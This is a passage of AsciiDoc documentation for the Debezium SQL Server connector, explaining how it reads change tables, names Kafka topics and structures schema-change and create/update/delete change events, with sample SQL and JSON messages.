baseline state, the connector captures subsequent changes as they occur.\n\n\/\/ Type: concept\n\/\/ ModuleID: debezium-sqlserver-ad-hoc-snapshots\n[id=\"sqlserver-ad-hoc-snapshots\"]\n==== Ad hoc snapshots\ninclude::{partialsdir}\/modules\/all-connectors\/con-connector-ad-hoc-snapshots.adoc[leveloffset=+3]\n\n\/\/ Type: concept\n[id=\"sqlserver-incremental-snapshots\"]\n==== Incremental snapshots\ninclude::{partialsdir}\/modules\/all-connectors\/con-connector-incremental-snapshot.adoc[leveloffset=+3]\n\n[WARNING]\n====\nThe {prodname} connector for SQL Server does not support schema changes while an incremental snapshot is running.\n====\n\n\/\/ Type: concept\n\/\/ ModuleID: how-the-debezium-sql-server-connector-reads-change-data-tables\n\/\/ Title: How {prodname} SQL Server connectors read change data tables\n=== Reading the change data tables\n\nWhen the connector first starts, it takes a structural snapshot of the structure of the captured tables\nand persists this information to its internal database schema history topic.\nThe connector then identifies a change table for each source table, and completes the following steps.\n\n1. For each change table, the connector read all of the changes that were created between the last stored maximum LSN and the current maximum LSN.\n2. The connector sorts the changes that it reads in ascending order, based on the values of their commit LSN and change LSN.\nThis sorting order ensures that the changes are replayed by {prodname} in the same order in which they occurred in the database.\n3. The connector passes the commit and change LSNs as offsets to Kafka Connect.\n4. The connector stores the maximum LSN and restarts the process from Step 1.\n\nAfter a restart, the connector resumes processing from the last offset (commit and change LSNs) that it read.\n\nThe connector is able to detect whether CDC is enabled or disabled for included source tables and adjust its behavior.\n\n\/\/ Type: concept\n\/\/ ModuleID: no-maximum-lsn-recorded-in-the-database\n\/\/ Title: No maximum LSN recorded in the database\n=== No maximum LSN recorded in the database\n\nThere may be situations when no maximum LSN is recorded in the database because:\n\n1. SQL Server Agent is not running\n2. No changes are recorded in the change table yet\n3. Database has low activity and the cdc clean up job periodically clears entries from the cdc tables\n\nOut of these possibilities, since a running SQL Server Agent is a prerequisite, No 1. is a real problem (while No 2. and 3. are normal).\n\nIn order to mitigate this issue and differentiate between No 1. and the others, a check for the status of the SQL Server Agent is done through the following query `\"SELECT CASE WHEN dss.[status]=4 THEN 1 ELSE 0 END AS isRunning FROM [#db].sys.dm_server_services dss WHERE dss.[servicename] LIKE N'SQL Server Agent (%';\"`.\nIf the SQL Server Agent is not running, an ERROR is written in the log: \"No maximum LSN recorded in the database; SQL Server Agent is not running\".\n\n[IMPORTANT]\n====\nThe SQL Server Agent running status query requires `VIEW SERVER STATE` server permission.\nIf you don't want to grant this permission to the configured user, you can choose to configure your own query through the `database.sqlserver.agent.status.query` property.\nYou can define a function which returns true or 1 if SQL Server Agent is running (false or 0 otherwise) and safely use High-Level permissions without granting them as explained\nhere link:https:\/\/dba.stackexchange.com\/questions\/62230\/what-minimum-permissions-do-i-need-to-provide-to-a-user-so-that-it-can-check-the\/103275#103275[What minimum permissions do I need to provide to a user so that it can check the status of SQL Server Agent Service?]\nor here link:https:\/\/sqlquantumleap.com\/2018\/02\/15\/safely-and-easily-use-high-level-permissions-without-granting-them-to-anyone-server-level\/[Safely and Easily Use High-Level Permissions Without Granting Them to Anyone: Server-level].\nThe configuration of the query property would look like: `database.sqlserver.agent.status.query=SELECT [#db].func_is_sql_server_agent_running()` - you need to use `[#db]` as placeholder for the database name.\n====\n\n\/\/ Type: concept\n\/\/ ModuleID: limitations-sql-server-connector\n\/\/ Title: Limitations of {prodname} SQL Server connector\n=== Limitations\n\nSQL Server specifically requires the base object to be a table in order to create a change capture instance.\nAs consequence, capturing changes from indexed views (aka. materialized views) is not supported by SQL Server and hence {prodname} SQL Server connector.\n\n\/\/ Type: concept\n\/\/ ModuleID: default-names-of-kafka-topics-that-receive-debezium-sql-server-change-event-records\n\/\/ Title: Default names of Kafka topics that receive {prodname} SQL Server change event records\n[[sqlserver-topic-names]]\n=== Topic names\n\nBy default, the SQL Server connector writes events for all `INSERT`, `UPDATE`, and `DELETE` operations that occur in a table to a single Apache Kafka topic that is specific to that table.\nThe connector uses the following convention to name change event topics:\n`_<topicPrefix>_._<schemaName>_._<tableName>_`\n\nThe following list provides definitions for the components of the default name:\n\n_topicPrefix_:: The logical name of the server, as specified by the xref:sqlserver-property-topic-prefix[`topic.prefix`] configuration property.\n_schemaName_:: The name of the database schema in which the change event occurred.\n_tableName_:: The name of the database table in which the change event occurred.\n\nFor example, if `fulfillment` is the server name, and `dbo` is the schema name, and the database contains tables with the names `products`, `products_on_hand`, `customers`, and `orders`,\nthe connector would stream change event records to the following Kafka topics:\n\n* `fulfillment.testDB.dbo.products`\n* `fulfillment.testDB.dbo.products_on_hand`\n* `fulfillment.testDB.dbo.customers`\n* `fulfillment.testDB.dbo.orders`\n\nThe connector applies similar naming conventions to label its internal database schema history topics, xref:about-the-debezium-sqlserver-connector-schema-change-topic[schema change topics], and xref:sqlserver-transaction-metadata[transaction metadata topics].\n\nIf the default topic name do not meet your requirements, you can configure custom topic names.\nTo configure custom topic names, you specify regular expressions in the logical topic routing SMT.\nFor more information about using the logical topic routing SMT to customize topic naming, see xref:{link-topic-routing}#topic-routing[Topic routing].\n\n\n\/\/ Type: concept\n\/\/ ModuleID: how-the-debezium-sql-server-connector-uses-the-schema-change-topic\n\/\/ Title: How the {prodname} SQL Server connector uses the schema change topic\n[[about-the-debezium-sqlserver-connector-schema-change-topic]]\n=== Schema change topic\n\nFor each table for which CDC is enabled, the {prodname} SQL Server connector stores a history of the schema change events that are applied to captured tables in the database.\nThe connector writes schema change events to a Kafka topic named `_<topicPrefix>_`, where `_topicPrefix_` is the logical server name that is specified in the xref:sqlserver-property-topic-prefix[`topic.prefix`] configuration property.\n\nMessages that the connector sends to the schema change topic contain a payload, and, optionally, also contain the schema of the change event message.\nThe payload of a schema change event message includes the following elements:\n\n`databaseName`:: The name of the database to which the statements are applied.\nThe value of `databaseName` serves as the message key.\n`tableChanges`:: A structured representation of the entire table schema after the schema change.\nThe `tableChanges` field contains an array that includes entries for each column of the table.\nBecause the structured representation presents data in JSON or Avro format, consumers can easily read messages without first processing them through a DDL parser.\n\n[IMPORTANT]\n====\nWhen the connector is configured to capture a table, it stores the history of the table's schema changes not only in the schema change topic, but also in an internal database schema history topic.\nThe internal database schema history topic is for connector use only and it is not intended for direct use by consuming applications.\nEnsure that applications that require notifications about schema changes consume that information only from the schema change topic.\n====\n\n[WARNING]\n====\nThe format of the messages that a connector emits to its schema change topic is in an incubating state and can change without notice.\n====\n\n{prodname} emits a message to the schema change topic when the following events occur:\n\n* You enable CDC for a table.\n* You disable CDC for a table.\n* You alter the structure of a table for which CDC is enabled by following the xref:{link-sqlserver-connector}#sqlserver-schema-evolution[schema evolution procedure].\n\n.Example: Message emitted to the SQL Server connector schema change topic\nThe following example shows a message in the schema change topic.\nThe message contains a logical representation of the table schema.\n\n[source,json,indent=0,subs=\"+attributes\"]\n----\n{\n \"schema\": {\n ...\n },\n \"payload\": {\n \"source\": {\n \"version\": \"{debezium-version}\",\n \"connector\": \"sqlserver\",\n \"name\": \"server1\",\n \"ts_ms\": 0,\n \"snapshot\": \"true\",\n \"db\": \"testDB\",\n \"schema\": \"dbo\",\n \"table\": \"customers\",\n \"change_lsn\": null,\n \"commit_lsn\": \"00000025:00000d98:00a2\",\n \"event_serial_no\": null\n },\n \"ts_ms\": 1588252618953, \/\/ <1>\n \"databaseName\": \"testDB\", \/\/ <2>\n \"schemaName\": \"dbo\",\n \"ddl\": null, \/\/ <3>\n \"tableChanges\": [ \/\/ <4>\n {\n \"type\": \"CREATE\", \/\/ <5>\n \"id\": \"\\\"testDB\\\".\\\"dbo\\\".\\\"customers\\\"\", \/\/ <6>\n \"table\": { \/\/ <7>\n \"defaultCharsetName\": null,\n \"primaryKeyColumnNames\": [ \/\/ <8>\n \"id\"\n ],\n \"columns\": [ \/\/ <9>\n {\n \"name\": \"id\",\n \"jdbcType\": 4,\n \"nativeType\": null,\n \"typeName\": \"int identity\",\n \"typeExpression\": \"int identity\",\n \"charsetName\": null,\n \"length\": 10,\n \"scale\": 0,\n \"position\": 1,\n \"optional\": false,\n \"autoIncremented\": false,\n \"generated\": false\n },\n {\n \"name\": \"first_name\",\n \"jdbcType\": 12,\n \"nativeType\": null,\n \"typeName\": \"varchar\",\n \"typeExpression\": \"varchar\",\n \"charsetName\": null,\n \"length\": 255,\n \"scale\": null,\n \"position\": 2,\n \"optional\": false,\n \"autoIncremented\": false,\n \"generated\": false\n },\n {\n \"name\": \"last_name\",\n \"jdbcType\": 12,\n \"nativeType\": null,\n \"typeName\": \"varchar\",\n \"typeExpression\": \"varchar\",\n \"charsetName\": null,\n \"length\": 255,\n \"scale\": null,\n \"position\": 3,\n \"optional\": false,\n \"autoIncremented\": false,\n \"generated\": false\n },\n {\n \"name\": \"email\",\n \"jdbcType\": 12,\n \"nativeType\": null,\n \"typeName\": \"varchar\",\n \"typeExpression\": \"varchar\",\n \"charsetName\": null,\n \"length\": 255,\n \"scale\": null,\n \"position\": 4,\n \"optional\": false,\n \"autoIncremented\": false,\n \"generated\": false\n }\n ],\n \"attributes\": [ \/\/ <10>\n {\n \"customAttribute\": \"attributeValue\"\n }\n ]\n }\n }\n ]\n }\n}\n----\n\n.Descriptions of fields in messages emitted to the schema change topic\n[cols=\"1,4,5\",options=\"header\"]\n|===\n|Item |Field name |Description\n\n|1\n|`ts_ms`\n|Optional field that displays the time at which the connector processed the event. The time is based on the system clock in the JVM running the Kafka Connect task.\n\nIn the source object, ts_ms indicates the time that the change was made in the database. By comparing the value for payload.source.ts_ms with the value for payload.ts_ms, you can determine the lag between the source database update and Debezium.\n\n|2\n|`databaseName` +\n`schemaName`\n|Identifies the database and the schema that contain the change.\n\n|3\n|`ddl`\n|Always `null` for the SQL Server connector.\nFor other connectors, this field contains the DDL responsible for the schema change.\nThis DDL is not available to SQL Server connectors.\n\n|4\n|`tableChanges`\n|An array of one or more items that contain the schema changes generated by a DDL command.\n\n|5\n|`type`\na|Describes the kind of change. The value is one of the following:\n\n* `CREATE` - table created\n* `ALTER` - table modified\n* `DROP` - table deleted\n\n|6\n|`id`\n|Full identifier of the table that was created, altered, or dropped.\n\n|7\n|`table`\n|Represents table metadata after the applied change.\n\n|8\n|`primaryKeyColumnNames`\n|List of columns that compose the table's primary key.\n\n|9\n|`columns`\n|Metadata for each column in the changed table.\n\n|10\n|`attributes`\n|Custom attribute metadata for each table change.\n\n|===\n\nIn messages that the connector sends to the schema change topic, the key is the name of the database that contains the schema change.\nIn the following example, the `payload` field contains the key:\n\n[source,json,indent=0,subs=\"+attributes\"]\n----\n{\n \"schema\": {\n \"type\": \"struct\",\n \"fields\": [\n {\n \"type\": \"string\",\n \"optional\": false,\n \"field\": \"databaseName\"\n }\n ],\n \"optional\": false,\n \"name\": \"io.debezium.connector.sqlserver.SchemaChangeKey\"\n },\n \"payload\": {\n \"databaseName\": \"testDB\"\n }\n}\n----\n\n\/\/ Type: assembly\n\/\/ ModuleID: descriptions-of-debezium-sql-server-connector-data-change-events\n\/\/ Title: Descriptions of {prodname} SQL Server connector data change events\n=== Data change events\n\nThe {prodname} SQL Server connector generates a data change event for each row-level `INSERT`, `UPDATE`, and `DELETE` operation. Each event contains a key and a value. The structure of the key and the value depends on the table that was changed.\n\n{prodname} and Kafka Connect are designed around _continuous streams of event messages_. However, the structure of these events may change over time, which can be difficult for consumers to handle. To address this, each event contains the schema for its content or, if you are using a schema registry, a schema ID that a consumer can use to obtain the schema from the registry. This makes each event self-contained.\n\nThe following skeleton JSON shows the basic four parts of a change event. However, how you configure the Kafka Connect converter that you choose to use in your application determines the representation of these four parts in change events. A `schema` field is in a change event only when you configure the converter to produce it. Likewise, the event key and event payload are in a change event only if you configure a converter to produce it. If you use the JSON converter and you configure it to produce all four basic change event parts, change events have this structure:\n\n[source,json,index=0]\n----\n{\n \"schema\": { \/\/ <1>\n ...\n },\n \"payload\": { \/\/ <2>\n ...\n },\n \"schema\": { \/\/ <3>\n ...\n },\n \"payload\": { \/\/ <4>\n ...\n },\n}\n----\n\n.Overview of change event basic content\n[cols=\"1,2,7\",options=\"header\"]\n|===\n|Item |Field name |Description\n\n|1\n|`schema`\n|The first `schema` field is part of the event key. It specifies a Kafka Connect schema that describes what is in the event key's `payload` portion. In other words, the first `schema` field describes the structure of the primary key, or the unique key if the table does not have a primary key, for the table that was changed. +\n +\nIt is possible to override the table's primary key by setting the xref:{link-sqlserver-connector}#sqlserver-property-message-key-columns[`message.key.columns` connector configuration property]. In this case, the first schema field describes the structure of the key identified by that property.\n\n|2\n|`payload`\n|The first `payload` field is part of the event key. It has the structure described by the previous `schema` field and it contains the key for the row that was changed.\n\n|3\n|`schema`\n|The second `schema` field is part of the event value. It specifies the Kafka Connect schema that describes what is in the event value's `payload` portion. In other words, the second `schema` describes the structure of the row that was changed. Typically, this schema contains nested schemas.\n\n|4\n|`payload`\n|The second `payload` field is part of the event value. It has the structure described by the previous `schema` field and it contains the actual data for the row that was changed.\n\n|===\n\nBy default, the connector streams change event records to topics with names that are the same as the event's originating table. See xref:{link-sqlserver-connector}#sqlserver-topic-names[topic names].\n\n[WARNING]\n====\nThe SQL Server connector ensures that all Kafka Connect schema names adhere to the link:http:\/\/avro.apache.org\/docs\/current\/spec.html#names[Avro schema name format]. This means that the logical server name must start with a Latin letter or an underscore, that is, a-z, A-Z, or \\_. Each remaining character in the logical server name and each character in the database and table names must be a Latin letter, a digit, or an underscore, that is, a-z, A-Z, 0-9, or \\_. If there is an invalid character it is replaced with an underscore character.\n\nThis can lead to unexpected conflicts if the logical server name, a database name, or a table name contains invalid characters, and the only characters that distinguish names from one another are invalid and thus replaced with underscores.\n====\n\nifdef::product[]\n\nFor details about change events, see the following topics:\n\n* xref:about-keys-in-debezium-sql-server-change-events[]\n* xref:about-values-in-debezium-sql-server-change-events[]\n\nendif::product[]\n\n\/\/ Type: concept\n\/\/ ModuleID: about-keys-in-debezium-sql-server-change-events\n\/\/ Title: About keys in {prodname} SQL Server change events\n[[sqlserver-change-event-keys]]\n==== Change event keys\n\nA change event's key contains the schema for the changed table's key and the changed row's actual key. Both the schema and its corresponding payload contain a field for each column in the changed table's primary key (or unique key constraint) at the time the connector created the event.\n\nConsider the following `customers` table, which is followed by an example of a change event key for this table.\n\n.Example table\n[source,sql,indent=0]\n----\nCREATE TABLE customers (\n id INTEGER IDENTITY(1001,1) NOT NULL PRIMARY KEY,\n first_name VARCHAR(255) NOT NULL,\n last_name VARCHAR(255) NOT NULL,\n email VARCHAR(255) NOT NULL UNIQUE\n);\n----\n\n.Example change event key\nEvery change event that captures a change to the `customers` table has the same event key schema. For as long as the `customers` table has the previous definition, every change event that captures a change to the `customers` table has the following key structure, which in JSON, looks like this:\n\n[source,json,indent=0]\n----\n{\n \"schema\": { \/\/ <1>\n \"type\": \"struct\",\n \"fields\": [ \/\/ <2>\n {\n \"type\": \"int32\",\n \"optional\": false,\n \"field\": \"id\"\n }\n ],\n \"optional\": false, \/\/ <3>\n \"name\": \"server1.testDB.dbo.customers.Key\" \/\/ <4>\n },\n \"payload\": { \/\/ <5>\n \"id\": 1004\n }\n}\n----\n\n.Description of change event key\n[cols=\"1,2,7\",options=\"header\"]\n|===\n|Item |Field name |Description\n\n|1\n|`schema`\n|The schema portion of the key specifies a Kafka Connect schema that describes what is in the key's `payload` portion.\n\n|2\n|`fields`\n|Specifies each field that is expected in the `payload`, including each field's name, type, and whether it is required. In this example, there is one required field named `id` of type `int32`.\n\n|3\n|`optional`\n|Indicates whether the event key must contain a value in its `payload` field. In this example, a value in the key's payload is required. A value in the key's payload field is optional when a table does not have a primary key.\n\n|4\n|`server1.dbo.testDB.customers.Key`\na|Name of the schema that defines the structure of the key's payload. This schema describes the structure of the primary key for the table that was changed. Key schema names have the format _connector-name_._database-schema-name_._table-name_.`Key`. In this example: +\n\n* `server1` is the name of the connector that generated this event. +\n* `dbo` is the database schema for the table that was changed. +\n* `customers` is the table that was updated.\n\n|5\n|`payload`\n|Contains the key for the row for which this change event was generated. In this example, the key, contains a single `id` field whose value is `1004`.\n\n|===\n\nifdef::community[]\n[NOTE]\n====\nAlthough the `column.exclude.list` and `column.include.list` connector configuration properties allow you to capture only a subset of table columns, all columns in a primary or unique key are always included in the event's key.\n====\n\n[WARNING]\n====\nIf the table does not have a primary or unique key, then the change event's key is null. This makes sense since the rows in a table without a primary or unique key constraint cannot be uniquely identified.\n====\nendif::community[]\n\n\n\/\/ Type: concept\n\/\/ ModuleID: about-values-in-debezium-sql-server-change-events\n\/\/ Title: About values in {prodname} SQL Server change events\n[[sqlserver-change-event-values]]\n==== Change event values\n\nThe value in a change event is a bit more complicated than the key. Like the key, the value has a `schema` section and a `payload` section. The `schema` section contains the schema that describes the `Envelope` structure of the `payload` section, including its nested fields. Change events for operations that create, update or delete data all have a value payload with an envelope structure.\n\nConsider the same sample table that was used to show an example of a change event key:\n\n[source,sql,indent=0]\n----\nCREATE TABLE customers (\n id INTEGER IDENTITY(1001,1) NOT NULL PRIMARY KEY,\n first_name VARCHAR(255) NOT NULL,\n last_name VARCHAR(255) NOT NULL,\n email VARCHAR(255) NOT NULL UNIQUE\n);\n----\n\nThe value portion of a change event for a change to this table is described for each event type.\n\nifdef::product[]\n\n* <<sqlserver-create-events,_create_ events>>\n* <<sqlserver-update-events,_update_ events>>\n* <<sqlserver-delete-events,_delete_ events>>\n\nendif::product[]\n\n[[sqlserver-create-events]]\n===== _create_ events\n\nThe following example shows the value portion of a change event that the connector generates for an operation that creates data in the `customers` table:\n\n[source,json,indent=0,subs=\"+attributes\"]\n----\n{\n \"schema\": { \/\/ <1>\n \"type\": \"struct\",\n \"fields\": [\n {\n \"type\": \"struct\",\n \"fields\": [\n {\n \"type\": \"int32\",\n \"optional\": false,\n \"field\": \"id\"\n },\n {\n \"type\": \"string\",\n \"optional\": false,\n \"field\": \"first_name\"\n },\n {\n \"type\": \"string\",\n \"optional\": false,\n \"field\": \"last_name\"\n },\n {\n \"type\": \"string\",\n \"optional\": false,\n \"field\": \"email\"\n }\n ],\n \"optional\": true,\n \"name\": \"server1.dbo.testDB.customers.Value\", \/\/ <2>\n \"field\": \"before\"\n },\n {\n \"type\": \"struct\",\n \"fields\": [\n {\n \"type\": \"int32\",\n \"optional\": false,\n \"field\": \"id\"\n },\n {\n \"type\": \"string\",\n \"optional\": false,\n \"field\": \"first_name\"\n },\n {\n \"type\": \"string\",\n \"optional\": false,\n \"field\": \"last_name\"\n },\n {\n \"type\": \"string\",\n \"optional\": false,\n \"field\": \"email\"\n }\n ],\n \"optional\": true,\n \"name\": \"server1.dbo.testDB.customers.Value\",\n \"field\": \"after\"\n },\n {\n \"type\": \"struct\",\n \"fields\": [\n {\n \"type\": \"string\",\n \"optional\": false,\n \"field\": \"version\"\n },\n {\n \"type\": \"string\",\n \"optional\": false,\n \"field\": \"connector\"\n },\n {\n \"type\": \"string\",\n \"optional\": false,\n \"field\": \"name\"\n },\n {\n \"type\": \"int64\",\n \"optional\": false,\n \"field\": \"ts_ms\"\n },\n {\n \"type\": \"boolean\",\n \"optional\": true,\n \"default\": false,\n \"field\": \"snapshot\"\n },\n {\n \"type\": \"string\",\n \"optional\": false,\n \"field\": \"db\"\n },\n {\n \"type\": \"string\",\n \"optional\": false,\n \"field\": \"schema\"\n },\n {\n \"type\": \"string\",\n \"optional\": false,\n \"field\": \"table\"\n },\n {\n \"type\": \"string\",\n \"optional\": true,\n \"field\": \"change_lsn\"\n },\n {\n \"type\": \"string\",\n \"optional\": true,\n \"field\": \"commit_lsn\"\n },\n {\n \"type\": \"int64\",\n \"optional\": true,\n \"field\": \"event_serial_no\"\n }\n ],\n \"optional\": false,\n \"name\": \"io.debezium.connector.sqlserver.Source\", \/\/ <3>\n \"field\": \"source\"\n },\n {\n \"type\": \"string\",\n \"optional\": false,\n \"field\": \"op\"\n },\n {\n \"type\": \"int64\",\n \"optional\": true,\n \"field\": \"ts_ms\"\n }\n ],\n \"optional\": false,\n \"name\": \"server1.dbo.testDB.customers.Envelope\" \/\/ <4>\n },\n \"payload\": { \/\/ <5>\n \"before\": null, \/\/ <6>\n \"after\": { \/\/ <7>\n \"id\": 1005,\n \"first_name\": \"john\",\n \"last_name\": \"doe\",\n \"email\": \"john.doe@example.org\"\n },\n \"source\": { \/\/ <8>\n \"version\": \"{debezium-version}\",\n \"connector\": \"sqlserver\",\n \"name\": \"server1\",\n \"ts_ms\": 1559729468470,\n \"snapshot\": false,\n \"db\": \"testDB\",\n \"schema\": \"dbo\",\n \"table\": \"customers\",\n \"change_lsn\": \"00000027:00000758:0003\",\n \"commit_lsn\": \"00000027:00000758:0005\",\n \"event_serial_no\": \"1\"\n },\n \"op\": \"c\", \/\/ <9>\n \"ts_ms\": 1559729471739 \/\/ <10>\n }\n}\n----\n\n\n.Descriptions of _create_ event value fields\n[cols=\"1,2,7\",options=\"header\"]\n|===\n|Item |Field name |Description\n\n|1\n|`schema`\n|The value's schema, which describes the structure of the value's payload. A change event's value schema is the same in every change event that the connector generates for a particular table.\n\n|2\n|`name`\na|In the `schema` section, each `name` field specifies the schema for a field in the value's payload. +\n +\n`server1.dbo.testDB.customers.Value` is the schema for the payload's `before` and `after` fields. This schema is specific to the `customers` table. +\n +\n Names of schemas for `before` and `after` fields are of the form `_logicalName_._database-schemaName_._tableName_.Value`, which ensures that the schema name is unique in the database.\n This means that when using the xref:{link-avro-serialization}#avro-serialization[Avro converter], the resulting Avro schema for each table in each logical source has its own evolution and history.\n\n|3\n|`name`\na|`io.debezium.connector.sqlserver.Source` is the schema for the payload's `source` field. This schema is specific to the SQL Server connector. The connector uses it for all events that it generates.\n\n|4\n|`name`\na|`server1.dbo.testDB.customers.Envelope` is the schema for the overall structure of the payload, where `server1` is the connector name, `dbo` is the database schema name, and `customers` is the table.\n\n|5\n|`payload`\n|The value's actual data. This is the information that the change event is providing. +\n +\nIt may appear that the JSON representations of the events are much larger than the rows they describe. This is because the JSON representation must include the schema and the payload portions of the message.\nHowever, by using the xref:{link-avro-serialization}#avro-serialization[Avro converter], you can significantly decrease the size of the messages that the connector streams to Kafka topics.\n\n|6\n|`before`\n|An optional field that specifies the state of the row before the event occurred. When the `op` field is `c` for create, as it is in this example, the `before` field is `null` since this change event is for new content.\n\n|7\n|`after`\n|An optional field that specifies the state of the row after the event occurred. In this example, the `after` field contains the values of the new row's `id`, `first_name`, `last_name`, and `email` columns.\n\n|8\n|`source`\na|Mandatory field that describes the source metadata for the event. This field contains information that you can use to compare this event with other events, with regard to the origin of the events, the order in which the events occurred, and whether events were part of the same transaction. The source metadata includes:\n\n* {prodname} version\n* Connector type and name\n* Database and schema names\n* Timestamp for when the change was made in the database\n* If the event was part of a snapshot\n* Name of the table that contains the new row\n* Server log offsets\n\n|9\n|`op`\na|Mandatory string that describes the type of operation that caused the connector to generate the event. In this example, `c` indicates that the operation created a row. Valid values are:\n\n* `c` = create\n* `u` = update\n* `d` = delete\n* `r` = read (applies to only snapshots)\n\n|10\n|`ts_ms`\na| Optional field that displays the time at which the connector processed the event.\nIn the event message envelope, the time is based on the system clock in the JVM running the Kafka Connect task. +\n +\nIn the `source` object, `ts_ms` indicates the time when a change was committed in the database.\nBy comparing the value for `payload.source.ts_ms` with the value for `payload.ts_ms`, you can determine the lag between the source database update and {prodname}.\n\n|===\n\n[[sqlserver-update-events]]\n===== _update_ events\n\nThe value of a change event for an update in the sample `customers` table has the same schema as a _create_ event for that table. Likewise, the event value's payload has the same structure. However, the event value payload contains different values in an _update_ event. Here is an example of a change event value in an event that the connector generates for an update in the `customers` table:\n\n[source,json,indent=0,subs=\"+attributes\"]\n----\n{\n \"schema\": { ... },\n \"payload\": {\n \"before\": { \/\/ <1>\n \"id\": 1005,\n \"first_name\": \"john\",\n \"last_name\": \"doe\",\n \"email\": \"john.doe@example.org\"\n },\n \"after\": { \/\/ <2>\n \"id\": 1005,\n \"first_name\": \"john\",\n \"last_name\": \"doe\",\n \"email\": \"noreply@example.org\"\n },\n \"source\": { \/\/ <3>\n \"version\": \"{debezium-version}\",\n \"connector\": \"sqlserver\",\n \"name\": \"server1\",\n \"ts_ms\": 1559729995937,\n \"snapshot\": false,\n \"db\": \"testDB\",\n \"schema\": \"dbo\",\n \"table\": \"customers\",\n \"change_lsn\": \"00000027:00000ac0:0002\",\n \"commit_lsn\": \"00000027:00000ac0:0007\",\n \"event_serial_no\": \"2\"\n },\n \"op\": \"u\", \/\/ <4>\n \"ts_ms\": 1559729998706 \/\/ <5>\n }\n}\n----\n\n\n.Descriptions of _update_ event value fields\n[cols=\"1,2,7\",options=\"header\"]\n|===\n|Item |Field name |Description\n\n|1\n|`before`\n|An optional field that specifies the state of the row before the event occurred. In an _update_ event value, the `before` field contains a field for each table column and the value that was in that column before the database commit. In this example, the `email` value is `john.doe@example.org.`\n\n|2\n|`after`\n| An optional field that specifies the state of the row after the event occurred. You can compare the `before` and `after` structures to determine what the update to this row was. In the example, the `email` value is now `noreply@example.org`.\n\n|3\n|`source`\na|Mandatory field that describes the source metadata for the event. The `source` field structure has the same fields as in a _create_ event, but some values are different, for example, the sample _update_ event has a different offset. The source metadata includes:\n\n* {prodname} version\n* Connector type and name\n* Database and schema names\n* Timestamp for when the change was made in the database\n* If the event was part of a snapshot\n* Name of the table that contains the new row\n* Server log offsets\n\nThe `event_serial_no` field differentiates events that have the same commit and change LSN. Typical situations for when this field has a value other than `1`:\n\n* _update_ events have the value set to `2` because the update generates two events in the CDC change table of SQL Server (link:https:\/\/docs.microsoft.com\/en-us\/sql\/relational-databases\/system-tables\/cdc-capture-instance-ct-transact-sql?view=sql-server-2017[see the source documentation for details]). The first event contains the old values and the second contains contains new values. The connector uses values in the first event to create the second event. The connector drops the first event.\n\n* When a primary key is updated SQL Server emits two evemts. A _delete_ event for the removal of the record with the old primary key value and a _create_ event for the addition of the record with the new primary key.\nBoth operations share the same commit and change LSN and their event numbers are `1` and `2`, respectively.\n\n|4\n|`op`\na|Mandatory string that describes the type of operation. In an _update_ event value, the `op` field value is `u`, signifying that this row changed because of an update.\n\n|5\n|`ts_ms`\na| Optional field that displays the time at which the connector processed the event.\nIn the event message envelope, the time is based on the system clock in the JVM running the Kafka Connect task. +\n +\nIn the `source` object, `ts_ms` indicates the time when the change was committed to the database.\nBy comparing the value for `payload.source.ts_ms` with the value for `payload.ts_ms`, you can determine the lag between the source database update and {prodname}.\n\n|===\n\n[NOTE]\n====\nUpdating the columns for a row's primary\/unique key changes the value of the row's key. When a key changes, {prodname} outputs _three_ events: a _delete_ event and a xref:{link-sqlserver-connector}#sqlserver-tombstone-events[tombstone event] with the old key for the row, followed by a _create_ event with the new key for the row.\n====\n\n[[sqlserver-delete-events]]\n===== _delete_ events\n\nThe value in a _delete_ change event has the same `schema` portion as _create_ and _update_ events for the same table. The `payload` portion in a _delete_ event for the sample `customers` table looks like this:\n\n[source,json,indent=0,subs=\"+attributes\"]\n----\n{\n \"schema\": { ... },\n },\n \"payload\": {\n \"before\": { <>\n \"id\": 1005,\n \"first_name\": \"john\",\n \"last_name\": \"doe\",\n \"email\": \"noreply@example.org\"\n },\n \"after\": null, <2>\n \"source\": { <3>\n \"version\": \"{debezium-version}\",\n \"connector\": \"sqlserver\",\n \"name\": \"server1\",\n \"ts_ms\": 1559730445243,\n \"snapshot\": false,\n \"db\": \"testDB\",\n \"schema\": \"dbo\",\n \"table\": \"customers\",\n \"change_lsn\": \"00000027:00000db0:0005\",\n \"commit_lsn\": \"00000027:00000db0:0007\",\n \"event_serial_no\": \"1\"\n },\n \"op\": \"d\", <4>\n \"ts_ms\": 1559730450205 <5>\n }\n}\n----\n\n.Descriptions of _delete_ event value fields\n[cols=\"1,2,7\",options=\"header\"]\n|===\n|Item |Field name |Description\n\n|1\n|`before`\n|Optional field that specifies the state of the row before the event occurred. In a _delete_ event value, the `before` field contains the values that were in the row before it was deleted with the database commit.\n\n|2\n|`after`\n| Optional field that specifies the state of the row after the event occurred. In a _delete_ event value, the `after` field is `null`, signifying that the row no longer exists.\n\n|3\n|`source`\na|Mandatory field that describes the source metadata for the event. In a _delete_ event value, the `source` field structure is the same as for _create_ and _update_ events for the same table. Many `source` field values are also the same. In a _delete_ event value, the `ts_ms` and `pos` field values, as well as other values, might have changed. But the `source` field in a _delete_ event value provides the same metadata:\n\n* {prodname} version\n* Connector type and name\n* Database and schema names\n* Timestamp for when the change was made in the database\n* If the event was part of a snapshot\n* Name of the table that contains the new row\n* Server log offsets\n\n|4\n|`op`\na|Mandatory string that describes the type of operation. The `op` field value is `d`, signifying that this row was deleted.\n\n|5\n|`ts_ms`\na| Optional field that displays the time at which the connector processed the event.\nIn the event message envelope, the time is based on the system clock in the JVM running the Kafka Connect task. +\n +\nIn the `source` object, `ts_ms` indicates the time that the change was made in the database.\nBy comparing the value for `payload.source.ts_ms` with the value for `payload.ts_ms`, you can determine the lag between the source database update and {prodname}.\n\n|===\n\nSQL Server connector events are designed to work with link:{link-kafka-docs}\/#compaction[Kafka log compaction]. Log compaction enables removal of some older messages as long as at least the most recent message for every key is kept. This lets Kafka reclaim storage space while ensuring that the topic contains a complete data set and can be used for reloading key-based state.\n\n[[sqlserver-tombstone-events]]\n.Tombstone events\nWhen a row is deleted, the _delete_ event value still works with log compaction, because Kafka can remove all earlier messages that have that same key. However, for Kafka to remove all messages that have that same key, the message value must be `null`. To make this possible, after {prodname}\u2019s SQL Server connector emits a _delete_ event, the connector emits a special tombstone event that has the same key but a `null` value.\n\n\/\/ Type: assembly\n\/\/ ModuleID: debezium-sql-server-connector-generated-events-that-represent-transaction-boundaries\n\/\/ Title: {prodname} SQL Server connector-generated events that represent transaction boundaries\n[[sqlserver-transaction-metadata]]\n=== Transaction metadata\n\n{prodname} can generate events that represent transaction boundaries and that enrich data change event 